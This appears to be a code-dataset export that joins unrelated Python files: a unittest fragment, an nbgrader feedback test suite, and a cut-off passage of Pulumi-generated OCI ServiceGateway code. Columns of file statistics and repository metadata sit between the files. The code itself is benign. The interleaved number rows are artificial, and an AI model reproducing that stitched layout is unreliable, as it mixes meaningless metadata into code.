self.assertEqual('cs_remote_path2', cs_info._cs_remote_path)
self.assertTrue(dep_info1._local_path_info.IsPathInLocalPaths('path1'))
self.assertTrue(dep_info1._local_path_info.IsPathInLocalPaths('path2'))
self.assertTrue(dep_info1._local_path_info.IsPathInLocalPaths('path3'))
self.assertFalse(dep_info1._local_path_info.IsPathInLocalPaths('path4'))
self.assertRaises(ValueError, dep_info1.Update, dep_info4)
| 47.795745
| 78
| 0.750712
| 1,388
| 11,232
| 5.67147
| 0.07781
| 0.120046
| 0.049543
| 0.062246
| 0.83905
| 0.800559
| 0.77312
| 0.749111
| 0.706809
| 0.691311
| 0
| 0.027186
| 0.138711
| 11,232
| 234
| 79
| 48
| 0.786541
| 0.020032
| 0
| 0.725888
| 0
| 0
| 0.149636
| 0.003818
| 0
| 0
| 0
| 0
| 0.48731
| 1
| 0.040609
| false
| 0
| 0.010152
| 0
| 0.055838
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
637f11d7059c137927173cd519a5e44b2644df0b
| 14,284
|
py
|
Python
|
nbgrader/tests/apps/test_nbgrader_feedback.py
|
lgpage/nbgrader
|
609a88b6237611a0cf293415ee25eeee51f19eda
|
[
"BSD-3-Clause-Clear"
] | 1
|
2018-06-18T14:47:01.000Z
|
2018-06-18T14:47:01.000Z
|
nbgrader/tests/apps/test_nbgrader_feedback.py
|
lgpage/nbgrader
|
609a88b6237611a0cf293415ee25eeee51f19eda
|
[
"BSD-3-Clause-Clear"
] | 1
|
2018-10-31T15:54:37.000Z
|
2018-10-31T15:54:37.000Z
|
nbgrader/tests/apps/test_nbgrader_feedback.py
|
lgpage/nbgrader
|
609a88b6237611a0cf293415ee25eeee51f19eda
|
[
"BSD-3-Clause-Clear"
] | null | null | null |
import os
import sys
from os.path import join, exists, isfile
from ...utils import remove
from .. import run_nbgrader
from .base import BaseTestApp
class TestNbGraderFeedback(BaseTestApp):
def test_help(self):
"""Does the help display without error?"""
run_nbgrader(["feedback", "--help-all"])
def test_single_file(self, db, course_dir):
"""Can feedback be generated for an unchanged assignment?"""
with open("nbgrader_config.py", "a") as fh:
fh.write("""c.CourseDirectory.db_assignments = [dict(name="ps1")]\n""")
fh.write("""c.CourseDirectory.db_students = [dict(id="foo")]\n""")
self._copy_file(join("files", "submitted-unchanged.ipynb"), join(course_dir, "source", "ps1", "p1.ipynb"))
run_nbgrader(["assign", "ps1", "--db", db])
self._copy_file(join("files", "submitted-unchanged.ipynb"), join(course_dir, "submitted", "foo", "ps1", "p1.ipynb"))
run_nbgrader(["autograde", "ps1", "--db", db])
run_nbgrader(["feedback", "ps1", "--db", db])
assert exists(join(course_dir, "feedback", "foo", "ps1", "p1.html"))
def test_force(self, db, course_dir):
"""Ensure the force option works properly"""
with open("nbgrader_config.py", "a") as fh:
fh.write("""c.CourseDirectory.db_assignments = [dict(name="ps1")]\n""")
fh.write("""c.CourseDirectory.db_students = [dict(id="foo")]\n""")
self._copy_file(join("files", "submitted-unchanged.ipynb"), join(course_dir, "source", "ps1", "p1.ipynb"))
self._make_file(join(course_dir, "source", "ps1", "foo.txt"), "foo")
self._make_file(join(course_dir, "source", "ps1", "data", "bar.txt"), "bar")
run_nbgrader(["assign", "ps1", "--db", db])
self._copy_file(join("files", "submitted-unchanged.ipynb"), join(course_dir, "submitted", "foo", "ps1", "p1.ipynb"))
self._make_file(join(course_dir, "submitted", "foo", "ps1", "foo.txt"), "foo")
self._make_file(join(course_dir, "submitted", "foo", "ps1", "data", "bar.txt"), "bar")
run_nbgrader(["autograde", "ps1", "--db", db])
self._make_file(join(course_dir, "autograded", "foo", "ps1", "blah.pyc"), "asdf")
run_nbgrader(["feedback", "ps1", "--db", db])
assert isfile(join(course_dir, "feedback", "foo", "ps1", "p1.html"))
assert isfile(join(course_dir, "feedback", "foo", "ps1", "foo.txt"))
assert isfile(join(course_dir, "feedback", "foo", "ps1", "data", "bar.txt"))
assert not isfile(join(course_dir, "feedback", "foo", "ps1", "blah.pyc"))
# check that it skips the existing directory
remove(join(course_dir, "feedback", "foo", "ps1", "foo.txt"))
run_nbgrader(["feedback", "ps1", "--db", db])
assert not isfile(join(course_dir, "feedback", "foo", "ps1", "foo.txt"))
# force overwrite the supplemental files
run_nbgrader(["feedback", "ps1", "--db", db, "--force"])
assert isfile(join(course_dir, "feedback", "foo", "ps1", "foo.txt"))
# force overwrite
remove(join(course_dir, "autograded", "foo", "ps1", "foo.txt"))
run_nbgrader(["feedback", "ps1", "--db", db, "--force"])
assert isfile(join(course_dir, "feedback", "foo", "ps1", "p1.html"))
assert not isfile(join(course_dir, "feedback", "foo", "ps1", "foo.txt"))
assert isfile(join(course_dir, "feedback", "foo", "ps1", "data", "bar.txt"))
assert not isfile(join(course_dir, "feedback", "foo", "ps1", "blah.pyc"))
def test_filter_notebook(self, db, course_dir):
"""Does feedback filter by notebook properly?"""
with open("nbgrader_config.py", "a") as fh:
fh.write("""c.CourseDirectory.db_assignments = [dict(name="ps1")]\n""")
fh.write("""c.CourseDirectory.db_students = [dict(id="foo")]\n""")
self._copy_file(join("files", "submitted-unchanged.ipynb"), join(course_dir, "source", "ps1", "p1.ipynb"))
self._make_file(join(course_dir, "source", "ps1", "foo.txt"), "foo")
self._make_file(join(course_dir, "source", "ps1", "data", "bar.txt"), "bar")
run_nbgrader(["assign", "ps1", "--db", db])
self._copy_file(join("files", "submitted-unchanged.ipynb"), join(course_dir, "submitted", "foo", "ps1", "p1.ipynb"))
self._make_file(join(course_dir, "submitted", "foo", "ps1", "foo.txt"), "foo")
self._make_file(join(course_dir, "submitted", "foo", "ps1", "data", "bar.txt"), "bar")
self._make_file(join(course_dir, "submitted", "foo", "ps1", "blah.pyc"), "asdf")
run_nbgrader(["autograde", "ps1", "--db", db])
run_nbgrader(["feedback", "ps1", "--db", db, "--notebook", "p1"])
assert isfile(join(course_dir, "feedback", "foo", "ps1", "p1.html"))
assert isfile(join(course_dir, "feedback", "foo", "ps1", "foo.txt"))
assert isfile(join(course_dir, "feedback", "foo", "ps1", "data", "bar.txt"))
assert not isfile(join(course_dir, "feedback", "foo", "ps1", "blah.pyc"))
# check that removing the notebook still causes it to run
remove(join(course_dir, "feedback", "foo", "ps1", "p1.html"))
remove(join(course_dir, "feedback", "foo", "ps1", "foo.txt"))
run_nbgrader(["feedback", "ps1", "--db", db, "--notebook", "p1"])
assert isfile(join(course_dir, "feedback", "foo", "ps1", "p1.html"))
assert isfile(join(course_dir, "feedback", "foo", "ps1", "foo.txt"))
assert isfile(join(course_dir, "feedback", "foo", "ps1", "data", "bar.txt"))
assert not isfile(join(course_dir, "feedback", "foo", "ps1", "blah.pyc"))
# check that running it again doesn"t do anything
remove(join(course_dir, "feedback", "foo", "ps1", "foo.txt"))
run_nbgrader(["feedback", "ps1", "--db", db, "--notebook", "p1"])
assert isfile(join(course_dir, "feedback", "foo", "ps1", "p1.html"))
assert not isfile(join(course_dir, "feedback", "foo", "ps1", "foo.txt"))
assert isfile(join(course_dir, "feedback", "foo", "ps1", "data", "bar.txt"))
assert not isfile(join(course_dir, "feedback", "foo", "ps1", "blah.pyc"))
# check that removing the notebook doesn"t cause it to run
remove(join(course_dir, "feedback", "foo", "ps1", "p1.html"))
run_nbgrader(["feedback", "ps1", "--db", db])
assert not isfile(join(course_dir, "feedback", "foo", "ps1", "p1.html"))
assert not isfile(join(course_dir, "feedback", "foo", "ps1", "foo.txt"))
assert isfile(join(course_dir, "feedback", "foo", "ps1", "data", "bar.txt"))
assert not isfile(join(course_dir, "feedback", "foo", "ps1", "blah.pyc"))
def test_permissions(self, course_dir):
"""Are permissions properly set?"""
with open("nbgrader_config.py", "a") as fh:
fh.write("""c.CourseDirectory.db_assignments = [dict(name="ps1")]\n""")
fh.write("""c.CourseDirectory.db_students = [dict(id="foo")]\n""")
self._empty_notebook(join(course_dir, "source", "ps1", "foo.ipynb"))
run_nbgrader(["assign", "ps1"])
self._empty_notebook(join(course_dir, "submitted", "foo", "ps1", "foo.ipynb"))
run_nbgrader(["autograde", "ps1"])
run_nbgrader(["feedback", "ps1"])
if sys.platform == 'win32':
perms = '666'
else:
perms = '644'
assert isfile(join(course_dir, "feedback", "foo", "ps1", "foo.html"))
assert self._get_permissions(join(course_dir, "feedback", "foo", "ps1", "foo.html")) == perms
def test_custom_permissions(self, course_dir):
"""Are custom permissions properly set?"""
with open("nbgrader_config.py", "a") as fh:
fh.write("""c.CourseDirectory.db_assignments = [dict(name="ps1")]\n""")
fh.write("""c.CourseDirectory.db_students = [dict(id="foo")]\n""")
self._empty_notebook(join(course_dir, "source", "ps1", "foo.ipynb"))
run_nbgrader(["assign", "ps1"])
self._empty_notebook(join(course_dir, "submitted", "foo", "ps1", "foo.ipynb"))
run_nbgrader(["autograde", "ps1"])
run_nbgrader(["feedback", "ps1", "--FeedbackApp.permissions=444"])
assert isfile(join(course_dir, "feedback", "foo", "ps1", "foo.html"))
assert self._get_permissions(join(course_dir, "feedback", "foo", "ps1", "foo.html")) == '444'
def test_force_single_notebook(self, course_dir):
with open("nbgrader_config.py", "a") as fh:
fh.write("""c.CourseDirectory.db_assignments = [dict(name="ps1")]\n""")
fh.write("""c.CourseDirectory.db_students = [dict(id="foo")]\n""")
self._copy_file(join("files", "test.ipynb"), join(course_dir, "source", "ps1", "p1.ipynb"))
self._copy_file(join("files", "test.ipynb"), join(course_dir, "source", "ps1", "p2.ipynb"))
run_nbgrader(["assign", "ps1"])
self._copy_file(join("files", "test.ipynb"), join(course_dir, "submitted", "foo", "ps1", "p1.ipynb"))
self._copy_file(join("files", "test.ipynb"), join(course_dir, "submitted", "foo", "ps1", "p2.ipynb"))
run_nbgrader(["autograde", "ps1"])
run_nbgrader(["feedback", "ps1"])
assert exists(join(course_dir, "feedback", "foo", "ps1", "p1.html"))
assert exists(join(course_dir, "feedback", "foo", "ps1", "p2.html"))
p1 = self._file_contents(join(course_dir, "feedback", "foo", "ps1", "p1.html"))
p2 = self._file_contents(join(course_dir, "feedback", "foo", "ps1", "p2.html"))
self._empty_notebook(join(course_dir, "autograded", "foo", "ps1", "p1.ipynb"))
self._empty_notebook(join(course_dir, "autograded", "foo", "ps1", "p2.ipynb"))
run_nbgrader(["feedback", "ps1", "--notebook", "p1", "--force"])
assert exists(join(course_dir, "feedback", "foo", "ps1", "p1.html"))
assert exists(join(course_dir, "feedback", "foo", "ps1", "p2.html"))
assert p1 != self._file_contents(join(course_dir, "feedback", "foo", "ps1", "p1.html"))
assert p2 == self._file_contents(join(course_dir, "feedback", "foo", "ps1", "p2.html"))
def test_update_newer(self, course_dir):
with open("nbgrader_config.py", "a") as fh:
fh.write("""c.CourseDirectory.db_assignments = [dict(name="ps1")]\n""")
fh.write("""c.CourseDirectory.db_students = [dict(id="foo")]\n""")
self._copy_file(join("files", "test.ipynb"), join(course_dir, "source", "ps1", "p1.ipynb"))
run_nbgrader(["assign", "ps1"])
self._copy_file(join("files", "test.ipynb"), join(course_dir, "submitted", "foo", "ps1", "p1.ipynb"))
self._make_file(join(course_dir, "submitted", "foo", "ps1", "timestamp.txt"), "2015-02-02 15:58:23.948203 PST")
run_nbgrader(["autograde", "ps1"])
run_nbgrader(["feedback", "ps1"])
assert isfile(join(course_dir, "feedback", "foo", "ps1", "p1.html"))
assert isfile(join(course_dir, "feedback", "foo", "ps1", "timestamp.txt"))
assert self._file_contents(join(course_dir, "feedback", "foo", "ps1", "timestamp.txt")) == "2015-02-02 15:58:23.948203 PST"
p = self._file_contents(join(course_dir, "feedback", "foo", "ps1", "p1.html"))
self._empty_notebook(join(course_dir, "autograded", "foo", "ps1", "p1.ipynb"))
self._make_file(join(course_dir, "autograded", "foo", "ps1", "timestamp.txt"), "2015-02-02 16:58:23.948203 PST")
run_nbgrader(["feedback", "ps1"])
assert isfile(join(course_dir, "feedback", "foo", "ps1", "p1.html"))
assert isfile(join(course_dir, "feedback", "foo", "ps1", "timestamp.txt"))
assert self._file_contents(join(course_dir, "feedback", "foo", "ps1", "timestamp.txt")) == "2015-02-02 16:58:23.948203 PST"
assert p != self._file_contents(join(course_dir, "feedback", "foo", "ps1", "p1.html"))
def test_update_newer_single_notebook(self, course_dir):
with open("nbgrader_config.py", "a") as fh:
fh.write("""c.CourseDirectory.db_assignments = [dict(name="ps1")]\n""")
fh.write("""c.CourseDirectory.db_students = [dict(id="foo")]\n""")
self._copy_file(join("files", "test.ipynb"), join(course_dir, "source", "ps1", "p1.ipynb"))
self._copy_file(join("files", "test.ipynb"), join(course_dir, "source", "ps1", "p2.ipynb"))
run_nbgrader(["assign", "ps1"])
self._copy_file(join("files", "test.ipynb"), join(course_dir, "submitted", "foo", "ps1", "p1.ipynb"))
self._copy_file(join("files", "test.ipynb"), join(course_dir, "submitted", "foo", "ps1", "p2.ipynb"))
self._make_file(join(course_dir, "submitted", "foo", "ps1", "timestamp.txt"), "2015-02-02 15:58:23.948203 PST")
run_nbgrader(["autograde", "ps1"])
run_nbgrader(["feedback", "ps1"])
assert exists(join(course_dir, "feedback", "foo", "ps1", "p1.html"))
assert exists(join(course_dir, "feedback", "foo", "ps1", "p2.html"))
assert isfile(join(course_dir, "feedback", "foo", "ps1", "timestamp.txt"))
assert self._file_contents(join(course_dir, "feedback", "foo", "ps1", "timestamp.txt")) == "2015-02-02 15:58:23.948203 PST"
p1 = self._file_contents(join(course_dir, "feedback", "foo", "ps1", "p1.html"))
p2 = self._file_contents(join(course_dir, "feedback", "foo", "ps1", "p2.html"))
self._empty_notebook(join(course_dir, "autograded", "foo", "ps1", "p1.ipynb"))
self._empty_notebook(join(course_dir, "autograded", "foo", "ps1", "p2.ipynb"))
self._make_file(join(course_dir, "autograded", "foo", "ps1", "timestamp.txt"), "2015-02-02 16:58:23.948203 PST")
run_nbgrader(["feedback", "ps1", "--notebook", "p1"])
assert exists(join(course_dir, "feedback", "foo", "ps1", "p1.html"))
assert exists(join(course_dir, "feedback", "foo", "ps1", "p2.html"))
assert isfile(join(course_dir, "feedback", "foo", "ps1", "timestamp.txt"))
assert self._file_contents(join(course_dir, "feedback", "foo", "ps1", "timestamp.txt")) == "2015-02-02 16:58:23.948203 PST"
assert p1 != self._file_contents(join(course_dir, "feedback", "foo", "ps1", "p1.html"))
assert p2 == self._file_contents(join(course_dir, "feedback", "foo", "ps1", "p2.html"))
| 59.516667
| 131
| 0.604873
| 1,848
| 14,284
| 4.513528
| 0.071429
| 0.120849
| 0.162091
| 0.161132
| 0.926268
| 0.916317
| 0.906606
| 0.899532
| 0.899532
| 0.889821
| 0
| 0.032691
| 0.181952
| 14,284
| 239
| 132
| 59.76569
| 0.68113
| 0.035004
| 0
| 0.824176
| 0
| 0
| 0.323902
| 0.048516
| 0
| 0
| 0
| 0
| 0.296703
| 1
| 0.049451
| false
| 0
| 0.032967
| 0
| 0.087912
| 0
| 0
| 0
| 0
| null | 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
63a17287ff34ce89f90f6c14e5d782770983f8af
| 35,215
|
py
|
Python
|
sdk/python/pulumi_oci/core/service_gateway.py
|
EladGabay/pulumi-oci
|
6841e27d4a1a7e15c672306b769912efbfd3ba99
|
[
"ECL-2.0",
"Apache-2.0"
] | 5
|
2021-08-17T11:14:46.000Z
|
2021-12-31T02:07:03.000Z
|
sdk/python/pulumi_oci/core/service_gateway.py
|
pulumi-oci/pulumi-oci
|
6841e27d4a1a7e15c672306b769912efbfd3ba99
|
[
"ECL-2.0",
"Apache-2.0"
] | 1
|
2021-09-06T11:21:29.000Z
|
2021-09-06T11:21:29.000Z
|
sdk/python/pulumi_oci/core/service_gateway.py
|
pulumi-oci/pulumi-oci
|
6841e27d4a1a7e15c672306b769912efbfd3ba99
|
[
"ECL-2.0",
"Apache-2.0"
] | 2
|
2021-08-24T23:31:30.000Z
|
2022-01-02T19:26:54.000Z
|
# coding=utf-8
# *** WARNING: this file was generated by the Pulumi Terraform Bridge (tfgen) Tool. ***
# *** Do not edit by hand unless you're certain you know what you are doing! ***
import warnings
import pulumi
import pulumi.runtime
from typing import Any, Mapping, Optional, Sequence, Union, overload
from .. import _utilities
from . import outputs
from ._inputs import *
__all__ = ['ServiceGatewayArgs', 'ServiceGateway']
@pulumi.input_type
class ServiceGatewayArgs:
def __init__(__self__, *,
compartment_id: pulumi.Input[str],
services: pulumi.Input[Sequence[pulumi.Input['ServiceGatewayServiceArgs']]],
vcn_id: pulumi.Input[str],
defined_tags: Optional[pulumi.Input[Mapping[str, Any]]] = None,
display_name: Optional[pulumi.Input[str]] = None,
freeform_tags: Optional[pulumi.Input[Mapping[str, Any]]] = None,
route_table_id: Optional[pulumi.Input[str]] = None):
"""
The set of arguments for constructing a ServiceGateway resource.
:param pulumi.Input[str] compartment_id: (Updatable) The [OCID] (https://docs.cloud.oracle.com/iaas/Content/General/Concepts/identifiers.htm) of the compartment to contain the service gateway.
:param pulumi.Input[Sequence[pulumi.Input['ServiceGatewayServiceArgs']]] services: (Updatable) List of the OCIDs of the [Service](https://docs.cloud.oracle.com/iaas/api/#/en/iaas/latest/Service/) objects to enable for the service gateway. This list can be empty if you don't want to enable any `Service` objects when you create the gateway. You can enable a `Service` object later by using either [AttachServiceId](https://docs.cloud.oracle.com/iaas/api/#/en/iaas/latest/ServiceGateway/AttachServiceId) or [UpdateServiceGateway](https://docs.cloud.oracle.com/iaas/api/#/en/iaas/latest/ServiceGateway/UpdateServiceGateway).
:param pulumi.Input[str] vcn_id: The [OCID](https://docs.cloud.oracle.com/iaas/Content/General/Concepts/identifiers.htm) of the VCN.
:param pulumi.Input[Mapping[str, Any]] defined_tags: (Updatable) Defined tags for this resource. Each key is predefined and scoped to a namespace. For more information, see [Resource Tags](https://docs.cloud.oracle.com/iaas/Content/General/Concepts/resourcetags.htm). Example: `{"Operations.CostCenter": "42"}`
:param pulumi.Input[str] display_name: (Updatable) A user-friendly name. Does not have to be unique, and it's changeable. Avoid entering confidential information.
:param pulumi.Input[Mapping[str, Any]] freeform_tags: (Updatable) Free-form tags for this resource. Each tag is a simple key-value pair with no predefined name, type, or namespace. For more information, see [Resource Tags](https://docs.cloud.oracle.com/iaas/Content/General/Concepts/resourcetags.htm). Example: `{"Department": "Finance"}`
:param pulumi.Input[str] route_table_id: (Updatable) The OCID of the route table the service gateway will use.
"""
pulumi.set(__self__, "compartment_id", compartment_id)
pulumi.set(__self__, "services", services)
pulumi.set(__self__, "vcn_id", vcn_id)
if defined_tags is not None:
pulumi.set(__self__, "defined_tags", defined_tags)
if display_name is not None:
pulumi.set(__self__, "display_name", display_name)
if freeform_tags is not None:
pulumi.set(__self__, "freeform_tags", freeform_tags)
if route_table_id is not None:
pulumi.set(__self__, "route_table_id", route_table_id)
@property
@pulumi.getter(name="compartmentId")
def compartment_id(self) -> pulumi.Input[str]:
"""
(Updatable) The [OCID] (https://docs.cloud.oracle.com/iaas/Content/General/Concepts/identifiers.htm) of the compartment to contain the service gateway.
"""
return pulumi.get(self, "compartment_id")
@compartment_id.setter
def compartment_id(self, value: pulumi.Input[str]):
pulumi.set(self, "compartment_id", value)
@property
@pulumi.getter
def services(self) -> pulumi.Input[Sequence[pulumi.Input['ServiceGatewayServiceArgs']]]:
"""
(Updatable) List of the OCIDs of the [Service](https://docs.cloud.oracle.com/iaas/api/#/en/iaas/latest/Service/) objects to enable for the service gateway. This list can be empty if you don't want to enable any `Service` objects when you create the gateway. You can enable a `Service` object later by using either [AttachServiceId](https://docs.cloud.oracle.com/iaas/api/#/en/iaas/latest/ServiceGateway/AttachServiceId) or [UpdateServiceGateway](https://docs.cloud.oracle.com/iaas/api/#/en/iaas/latest/ServiceGateway/UpdateServiceGateway).
"""
return pulumi.get(self, "services")
@services.setter
def services(self, value: pulumi.Input[Sequence[pulumi.Input['ServiceGatewayServiceArgs']]]):
pulumi.set(self, "services", value)
@property
@pulumi.getter(name="vcnId")
def vcn_id(self) -> pulumi.Input[str]:
"""
The [OCID](https://docs.cloud.oracle.com/iaas/Content/General/Concepts/identifiers.htm) of the VCN.
"""
return pulumi.get(self, "vcn_id")
@vcn_id.setter
def vcn_id(self, value: pulumi.Input[str]):
pulumi.set(self, "vcn_id", value)
@property
@pulumi.getter(name="definedTags")
def defined_tags(self) -> Optional[pulumi.Input[Mapping[str, Any]]]:
"""
(Updatable) Defined tags for this resource. Each key is predefined and scoped to a namespace. For more information, see [Resource Tags](https://docs.cloud.oracle.com/iaas/Content/General/Concepts/resourcetags.htm). Example: `{"Operations.CostCenter": "42"}`
"""
return pulumi.get(self, "defined_tags")
@defined_tags.setter
def defined_tags(self, value: Optional[pulumi.Input[Mapping[str, Any]]]):
pulumi.set(self, "defined_tags", value)
@property
@pulumi.getter(name="displayName")
def display_name(self) -> Optional[pulumi.Input[str]]:
"""
(Updatable) A user-friendly name. Does not have to be unique, and it's changeable. Avoid entering confidential information.
"""
return pulumi.get(self, "display_name")
@display_name.setter
def display_name(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "display_name", value)
@property
@pulumi.getter(name="freeformTags")
def freeform_tags(self) -> Optional[pulumi.Input[Mapping[str, Any]]]:
"""
(Updatable) Free-form tags for this resource. Each tag is a simple key-value pair with no predefined name, type, or namespace. For more information, see [Resource Tags](https://docs.cloud.oracle.com/iaas/Content/General/Concepts/resourcetags.htm). Example: `{"Department": "Finance"}`
"""
return pulumi.get(self, "freeform_tags")
@freeform_tags.setter
def freeform_tags(self, value: Optional[pulumi.Input[Mapping[str, Any]]]):
pulumi.set(self, "freeform_tags", value)
@property
@pulumi.getter(name="routeTableId")
def route_table_id(self) -> Optional[pulumi.Input[str]]:
"""
(Updatable) The OCID of the route table the service gateway will use.
"""
return pulumi.get(self, "route_table_id")
@route_table_id.setter
def route_table_id(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "route_table_id", value)
@pulumi.input_type
class _ServiceGatewayState:
def __init__(__self__, *,
block_traffic: Optional[pulumi.Input[bool]] = None,
compartment_id: Optional[pulumi.Input[str]] = None,
defined_tags: Optional[pulumi.Input[Mapping[str, Any]]] = None,
display_name: Optional[pulumi.Input[str]] = None,
freeform_tags: Optional[pulumi.Input[Mapping[str, Any]]] = None,
route_table_id: Optional[pulumi.Input[str]] = None,
services: Optional[pulumi.Input[Sequence[pulumi.Input['ServiceGatewayServiceArgs']]]] = None,
state: Optional[pulumi.Input[str]] = None,
time_created: Optional[pulumi.Input[str]] = None,
vcn_id: Optional[pulumi.Input[str]] = None):
"""
Input properties used for looking up and filtering ServiceGateway resources.
:param pulumi.Input[bool] block_traffic: Whether the service gateway blocks all traffic through it. The default is `false`. When this is `true`, traffic is not routed to any services, regardless of route rules. Example: `true`
:param pulumi.Input[str] compartment_id: (Updatable) The [OCID] (https://docs.cloud.oracle.com/iaas/Content/General/Concepts/identifiers.htm) of the compartment to contain the service gateway.
:param pulumi.Input[Mapping[str, Any]] defined_tags: (Updatable) Defined tags for this resource. Each key is predefined and scoped to a namespace. For more information, see [Resource Tags](https://docs.cloud.oracle.com/iaas/Content/General/Concepts/resourcetags.htm). Example: `{"Operations.CostCenter": "42"}`
:param pulumi.Input[str] display_name: (Updatable) A user-friendly name. Does not have to be unique, and it's changeable. Avoid entering confidential information.
:param pulumi.Input[Mapping[str, Any]] freeform_tags: (Updatable) Free-form tags for this resource. Each tag is a simple key-value pair with no predefined name, type, or namespace. For more information, see [Resource Tags](https://docs.cloud.oracle.com/iaas/Content/General/Concepts/resourcetags.htm). Example: `{"Department": "Finance"}`
:param pulumi.Input[str] route_table_id: (Updatable) The OCID of the route table the service gateway will use.
:param pulumi.Input[Sequence[pulumi.Input['ServiceGatewayServiceArgs']]] services: (Updatable) List of the OCIDs of the [Service](https://docs.cloud.oracle.com/iaas/api/#/en/iaas/latest/Service/) objects to enable for the service gateway. This list can be empty if you don't want to enable any `Service` objects when you create the gateway. You can enable a `Service` object later by using either [AttachServiceId](https://docs.cloud.oracle.com/iaas/api/#/en/iaas/latest/ServiceGateway/AttachServiceId) or [UpdateServiceGateway](https://docs.cloud.oracle.com/iaas/api/#/en/iaas/latest/ServiceGateway/UpdateServiceGateway).
:param pulumi.Input[str] state: The service gateway's current state.
:param pulumi.Input[str] time_created: The date and time the service gateway was created, in the format defined by [RFC3339](https://tools.ietf.org/html/rfc3339). Example: `2016-08-25T21:10:29.600Z`
:param pulumi.Input[str] vcn_id: The [OCID](https://docs.cloud.oracle.com/iaas/Content/General/Concepts/identifiers.htm) of the VCN.
"""
if block_traffic is not None:
pulumi.set(__self__, "block_traffic", block_traffic)
if compartment_id is not None:
pulumi.set(__self__, "compartment_id", compartment_id)
if defined_tags is not None:
pulumi.set(__self__, "defined_tags", defined_tags)
if display_name is not None:
pulumi.set(__self__, "display_name", display_name)
if freeform_tags is not None:
pulumi.set(__self__, "freeform_tags", freeform_tags)
if route_table_id is not None:
pulumi.set(__self__, "route_table_id", route_table_id)
if services is not None:
pulumi.set(__self__, "services", services)
if state is not None:
pulumi.set(__self__, "state", state)
if time_created is not None:
pulumi.set(__self__, "time_created", time_created)
if vcn_id is not None:
pulumi.set(__self__, "vcn_id", vcn_id)
@property
@pulumi.getter(name="blockTraffic")
def block_traffic(self) -> Optional[pulumi.Input[bool]]:
"""
Whether the service gateway blocks all traffic through it. The default is `false`. When this is `true`, traffic is not routed to any services, regardless of route rules. Example: `true`
"""
return pulumi.get(self, "block_traffic")
@block_traffic.setter
def block_traffic(self, value: Optional[pulumi.Input[bool]]):
pulumi.set(self, "block_traffic", value)
@property
@pulumi.getter(name="compartmentId")
def compartment_id(self) -> Optional[pulumi.Input[str]]:
"""
(Updatable) The [OCID] (https://docs.cloud.oracle.com/iaas/Content/General/Concepts/identifiers.htm) of the compartment to contain the service gateway.
"""
return pulumi.get(self, "compartment_id")
@compartment_id.setter
def compartment_id(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "compartment_id", value)
@property
@pulumi.getter(name="definedTags")
def defined_tags(self) -> Optional[pulumi.Input[Mapping[str, Any]]]:
"""
(Updatable) Defined tags for this resource. Each key is predefined and scoped to a namespace. For more information, see [Resource Tags](https://docs.cloud.oracle.com/iaas/Content/General/Concepts/resourcetags.htm). Example: `{"Operations.CostCenter": "42"}`
"""
return pulumi.get(self, "defined_tags")
@defined_tags.setter
def defined_tags(self, value: Optional[pulumi.Input[Mapping[str, Any]]]):
pulumi.set(self, "defined_tags", value)
@property
@pulumi.getter(name="displayName")
def display_name(self) -> Optional[pulumi.Input[str]]:
"""
(Updatable) A user-friendly name. Does not have to be unique, and it's changeable. Avoid entering confidential information.
"""
return pulumi.get(self, "display_name")
@display_name.setter
def display_name(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "display_name", value)
@property
@pulumi.getter(name="freeformTags")
def freeform_tags(self) -> Optional[pulumi.Input[Mapping[str, Any]]]:
"""
(Updatable) Free-form tags for this resource. Each tag is a simple key-value pair with no predefined name, type, or namespace. For more information, see [Resource Tags](https://docs.cloud.oracle.com/iaas/Content/General/Concepts/resourcetags.htm). Example: `{"Department": "Finance"}`
"""
return pulumi.get(self, "freeform_tags")
@freeform_tags.setter
def freeform_tags(self, value: Optional[pulumi.Input[Mapping[str, Any]]]):
pulumi.set(self, "freeform_tags", value)
@property
@pulumi.getter(name="routeTableId")
def route_table_id(self) -> Optional[pulumi.Input[str]]:
"""
(Updatable) The OCID of the route table the service gateway will use.
"""
return pulumi.get(self, "route_table_id")
@route_table_id.setter
def route_table_id(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "route_table_id", value)
@property
@pulumi.getter
def services(self) -> Optional[pulumi.Input[Sequence[pulumi.Input['ServiceGatewayServiceArgs']]]]:
"""
(Updatable) List of the OCIDs of the [Service](https://docs.cloud.oracle.com/iaas/api/#/en/iaas/latest/Service/) objects to enable for the service gateway. This list can be empty if you don't want to enable any `Service` objects when you create the gateway. You can enable a `Service` object later by using either [AttachServiceId](https://docs.cloud.oracle.com/iaas/api/#/en/iaas/latest/ServiceGateway/AttachServiceId) or [UpdateServiceGateway](https://docs.cloud.oracle.com/iaas/api/#/en/iaas/latest/ServiceGateway/UpdateServiceGateway).
"""
return pulumi.get(self, "services")
@services.setter
def services(self, value: Optional[pulumi.Input[Sequence[pulumi.Input['ServiceGatewayServiceArgs']]]]):
pulumi.set(self, "services", value)
@property
@pulumi.getter
def state(self) -> Optional[pulumi.Input[str]]:
"""
The service gateway's current state.
"""
return pulumi.get(self, "state")
@state.setter
def state(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "state", value)
@property
@pulumi.getter(name="timeCreated")
def time_created(self) -> Optional[pulumi.Input[str]]:
"""
The date and time the service gateway was created, in the format defined by [RFC3339](https://tools.ietf.org/html/rfc3339). Example: `2016-08-25T21:10:29.600Z`
"""
return pulumi.get(self, "time_created")
@time_created.setter
def time_created(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "time_created", value)
@property
@pulumi.getter(name="vcnId")
def vcn_id(self) -> Optional[pulumi.Input[str]]:
"""
The [OCID](https://docs.cloud.oracle.com/iaas/Content/General/Concepts/identifiers.htm) of the VCN.
"""
return pulumi.get(self, "vcn_id")
@vcn_id.setter
def vcn_id(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "vcn_id", value)
